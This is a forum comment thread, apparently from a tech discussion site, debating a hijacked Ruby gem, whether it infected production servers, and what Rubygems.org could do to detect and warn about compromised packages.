So...we can all ignore how a popular ruby gem was hijacked and used to infect production webservers with malware because (to paraphrase) "it wasn't that popular"?
This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?
How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.
This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version release without github repo changes, maintainer email on haveIbeenpwned and no password change since that date, etc).
No, I didn't say that, and I would prefer that you not put words in my mouth. I was responding to a single statement in the parent comment that I thought was inaccurate.
> a [...] ruby gem was hijacked and used to infect production webservers with malware
I wasn't aware of any reports of this being exploited in production. Do you have an example?
I agree with the rest of your comment about the need for more active measures on the part of Rubygems.org and the likelihood that other gems -- especially infrequently used, semi-abandoned ones like this -- have been hijacked without anyone detecting.
no, I don't have any examples, but then, it's not likely we're going to hear of any - anyone affected is probably unaware (until now, maybe). I guess some might come out of the woodwork now.
But again, Rubygems should have data on who downloaded this version of this gem, and so should be able to warn them, and even publish that data so we know not to visit their sites until they acknowledge and fix.
This was caught because the author diligently checked their dependencies line by line. How many ruby devs do that?
How many other gems are already hijacked but haven't been discovered because no-one has audited them? That number is almost certainly non-zero.
This is on Rubygems.org. They have enough information to warn devs that the gem might be infected (months since the maintainer logged in, gem version release without github repo changes, maintainer email on haveIbeenpwned and no password change since that date, etc).